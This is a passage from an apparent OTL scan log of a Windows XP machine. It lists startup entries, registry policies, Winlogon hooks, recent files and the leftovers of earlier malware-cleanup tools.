O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [QuickCare2.2] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe ()
O4 - HKCU..\Run: [Spotify Web Helper] C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe ()
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Acer WLAN 11g USB Dongle.lnk = C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: intuit.com ([ttlc] https in Trusted sites)
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} http://pcpitstop.com/pcpitstop/PCPitStop.CAB (PCPitstop Utility)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Reg Error: Key error.)
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} http://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab (MSN Photo Upload Tool)
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab (OnlineScanner Control)
O16 - DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805}: DhcpNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: C:\Documents and Settings\Jay\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Jay\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/07/19 20:08:24 | 000,000,050 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O36 - AppCertDlls: x64 - (c:\program files\settings manager\smdmf\x64\sysapcrt.dll) -  File not found
O36 - AppCertDlls: x86 - (c:\program files\settings manager\smdmf\sysapcrt.dll) -  File not found
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
NetSvcs: 6to4 -  File not found
NetSvcs: Ias -  File not found
NetSvcs: Iprip -  File not found
NetSvcs: Irmon -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: WmdmPmSp -  File not found
 
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/08/29 21:07:11 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Jay\Desktop\OTL.scr
[2014/08/29 18:04:00 | 002,347,384 | ---- | C] (ESET) -- C:\Documents and Settings\Jay\Desktop\esetsmartinstaller_enu.exe
[2014/08/29 15:24:50 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
[2014/08/24 11:36:14 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/08/24 11:34:03 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/08/23 09:50:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\MRT
[2014/08/21 21:35:16 | 000,000,000 | ---D | C] -- C:\FRST
[2014/08/18 22:58:03 | 000,000,000 | ---D | C] -- C:\4ea9f4d50c4d13298e29e45991c07f
[2014/08/17 12:00:58 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\xp_eos.exe
[2014/08/17 12:00:58 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\xp_eos.exe
[2014/08/10 19:57:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Jay\AppData
[2014/08/10 19:45:46 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2014/08/10 19:02:54 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2014/08/10 19:02:54 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2014/08/10 19:02:54 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2014/08/10 19:02:54 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2014/08/10 19:02:34 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/08/10 18:58:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
[2014/08/10 14:35:49 | 000,536,576 | ---- | C] (SQLite Development Team) -- C:\WINDOWS\System32\sqlite3.dll
[2014/08/10 14:32:56 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/08/10 14:28:44 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/08/29 21:11:23 | 000,000,880 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2014/08/29 21:06:42 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Jay\Desktop\OTL.scr
[2014/08/29 21:01:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2014/08/29 18:11:04 | 000,000,876 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2014/08/29 18:04:06 | 002,347,384 | ---- | M] (ESET) -- C:\Documents and Settings\Jay\Desktop\esetsmartinstaller_enu.exe
[2014/08/29 17:49:26 | 000,000,364 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2014/08/29 17:49:19 | 000,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2014/08/29 17:48:59 | 000,000,218 | ---- | M] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Logon.job
[2014/08/29 17:48:51 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/08/29 17:48:50 | 1063,768,064 | -HS- | M] () -- C:\hiberfil.sys
[2014/08/23 18:38:52 | 000,000,212 | ---- | M] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Monthly.job
[2014/08/23 18:32:29 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2014/08/23 17:46:21 | 000,347,400 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2014/08/23 10:21:29 | 000,688,058 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2014/08/23 10:21:29 | 000,163,952 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2014/08/23 10:15:13 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2014/08/10 20:57:30 | 000,002,503 | ---- | M] () -- C:\Documents and Settings\Jay\Desktop\Launch Google Earth.lnk
[2014/08/10 19:33:29 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts.20140818-224430.backup
[2014/08/10 14:31:30 | 001,366,203 | ---- | M] () -- C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/08/23 17:51:13 | 000,000,218 | ---- | C] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Logon.job
[2014/08/23 17:51:12 | 000,000,212 | ---- | C] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Monthly.job
[2014/08/14 23:20:46 | 1063,768,064 | -HS- | C] () -- C:\hiberfil.sys
[2014/08/10 19:02:54 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2014/08/10 19:02:54 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2014/08/10 19:02:54 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2014/08/10 19:02:54 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2014/08/10 19:02:54 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2014/08/10 14:31:25 | 001,366,203 | ---- | C] () -- C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
[2013/10/20 21:33:54 | 000,001,972 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2013/09/11 18:57:45 | 000,000,190 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\rbxcsettings.rbx
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswVmm.sys.sum
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswSP.sys.sum
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswSnx.sys.sum
[2013/03/21 01:25:07 | 000,175,176 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswVmm.sys
[2013/03/21 01:25:04 | 000,049,376 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswRvrt.sys
[2012/03/30 17:49:57 | 001,982,108 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-S-1-5-21-943902637-2227688448-3181155623-1005-0.dat
[2012/03/30 17:49:55 | 000,329,346 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat
[2012/03/30 16:35:54 | 000,000,590 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\Microsoft.SqlServer.Compact.400.32.bc
[2008/11/15 13:48:49 | 000,000,056 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\84756-11986-27475-00TC1-94865
[2007/04/28 03:44:36 | 000,007,168 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/04/18 17:15:12 | 000,000,126 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\fusioncache.dat
 
========== ZeroAccess Check ==========
 
[2006/07/19 20:06:02 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shdocvw.dll -- [2008/04/13 18:12:05 | 001,499,136 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/02/09 06:10:48 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2008/04/13 18:12:08 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2012/10/18 18:03:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\188F1432-103A-4ffb-80F1-36B633C5C9E1
[2009/04/25 16:23:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Amazon
[2011/09/05 22:24:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2007/11/04 21:13:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Avocent AdminWorks
[2013/08/25 10:35:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Cisco Systems
[2011/09/02 17:31:50 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\Common Files
[2010/10/13 22:54:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\F-Secure
[2011/09/02 17:24:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
[2009/08/06 21:23:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WinZip
[2011/01/16 12:37:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
[2009/09/19 23:27:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
[2011/06/18 16:45:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\.minecraft
[2007/11/04 21:13:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Avocent AdminWorks
[2012/10/16 01:38:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Azureus
[2007/07/23 21:37:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Canon
[2014/04/19 21:59:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop
[2013/02/07 17:54:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1
[2010/09/19 11:10:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop.FB9956FD96E03239939108614098AD95535EE674.1
[2008/10/30 22:05:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\FileZilla
[2014/08/10 18:58:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
[2011/11/18 23:26:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Rovio
[2012/07/18 20:19:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\spiral
[2013/02/25 23:08:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Spotify
[2012/01/08 20:52:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Unity
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %SYSTEMDRIVE%\*.* >
[2012/10/05 19:57:22 | 000,000,000 | ---- | M] () -- C:\1Clickfoldertest.txt
[2006/07/19 20:08:24 | 000,000,050 | ---- | M] () -- C:\AUTOEXEC.BAT
[2007/04/18 17:04:51 | 000,000,211 | ---- | M] () -- C:\Boot.bak
[2013/10/20 20:29:35 | 000,000,361 | RHS- | M] () -- C:\boot.ini
[2011/09/02 18:10:37 | 000,005,098 | ---- | M] () -- C:\CD3rdPartyWrapper.log
[2004/08/03 23:00:00 | 000,260,272 | RHS- | M] () -- C:\cmldr
[2014/08/10 19:41:00 | 000,023,603 | ---- | M] () -- C:\ComboFix.txt
[2012/08/24 18:09:34 | 000,005,287 | ---- | M] () -- C:\comcastrelease.log
[2006/07/19 19:43:46 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2014/08/29 17:48:50 | 1063,768,064 | -HS- | M] () -- C:\hiberfil.sys
[2006/07/19 19:43:46 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2014/07/21 20:50:56 | 000,002,245 | ---- | M] () -- C:\logFileUI.txt
[2006/07/19 19:43:46 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2004/08/03 23:00:00 | 000,047,564 | RHS- | M] () -- C:\NTDETECT.COM
[2008/10/11 13:14:14 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2014/08/29 17:48:49 | 1598,029,824 | -HS- | M] () -- C:\pagefile.sys
[2006/07/19 20:12:36 | 000,000,076 | RHS- | M] () -- C:\Preload.aaa
[2006/07/19 20:02:26 | 000,000,499 | ---- | M] () -- C:\RHDSetup.log
[2014/08/10 13:38:29 | 000,000,458 | ---- | M] () -- C:\rkill.log
[2010/01/29 13:09:46 | 000,003,630 | ---- | M] () -- C:\scramble.log
[2011/09/02 21:47:14 | 000,039,512 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_02.09.2011_21.46.01_log.txt
[2011/09/03 22:51:48 | 000,037,494 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_03.09.2011_22.51.21_log.txt
[2011/09/03 22:52:51 | 000,037,494 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_03.09.2011_22.52.06_log.txt
[2014/05/08 19:05:46 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_08.05.2014_19.05.43_log.txt
[2014/08/10 18:54:09 | 000,041,158 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_10.08.2014_18.53.24_log.txt
[2012/10/16 01:48:18 | 000,041,358 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_16.10.2012_01.46.36_log.txt
[2012/10/16 02:23:50 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_16.10.2012_02.23.45_log.txt
[2014/08/18 22:32:36 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_18.08.2014_22.32.31_log.txt
[2013/10/20 19:39:43 | 000,080,378 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_20.10.2013_19.37.25_log.txt
[2014/07/21 21:12:22 | 000,041,510 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_21.07.2014_21.10.48_log.txt
[2014/07/22 19:44:53 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_22.07.2014_19.44.51_log.txt
[2014/07/25 21:28:39 | 000,041,510 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_25.07.2014_21.26.15_log.txt
[2012/10/16 02:25:00 | 000,090,910 | ---- | M] () -- C:\TDSSKiller.2.8.13.0_16.10.2012_02.24.22_log.txt
[2013/10/20 19:40:51 | 000,129,570 | ---- | M] () -- C:\TDSSKiller.3.0.0.14_20.10.2013_19.39.51_log.txt
[2014/08/18 22:35:16 | 000,147,238 | ---- | M] () -- C:\TDSSKiller.3.0.0.40_18.08.2014_22.33.58_log.txt
[2014/07/22 19:48:13 | 000,145,768 | ---- | M] () -- C:\TDSSKiller.3.0.0.40_22.07.2014_19.46.14_log.txt
 
< %systemroot%\system32\Spool\prtprocs\w32x86\*.dll >
[2008/07/06 06:06:10 | 000,089,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\filterpipelineprintproc.dll
[2009/10/21 15:29:40 | 000,320,512 | ---- | M] (Hewlett-Packard Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\hpfpp101.dll
 
< %systemroot%\*. /mp /s >
 
< %systemroot%\system32\*.dll /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]
 
< %systemroot%\Tasks\*.job /lockedfiles >
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\system32\*.exe /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]
 
< %systemroot%\System32\config\*.sav >
[2006/07/19 12:35:24 | 000,094,208 | ---- | M] () -- C:\WINDOWS\System32\config\default.sav
[2006/07/19 12:35:24 | 000,659,456 | ---- | M] () -- C:\WINDOWS\System32\config\software.sav
[2006/07/19 12:35:24 | 000,901,120 | ---- | M] () -- C:\WINDOWS\System32\config\system.sav
 
< %PROGRAMFILES%\* >
 
< %USERPROFILE%\..|smtmp;true;true;true /FP >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU >
 
< hklm\software\clients\startmenuinternet|command /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/25 16:34:44 | 000,643,312 | ---- | M] (Microsoft Corporation)
 
< hklm\software\clients\startmenuinternet|command /64 /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
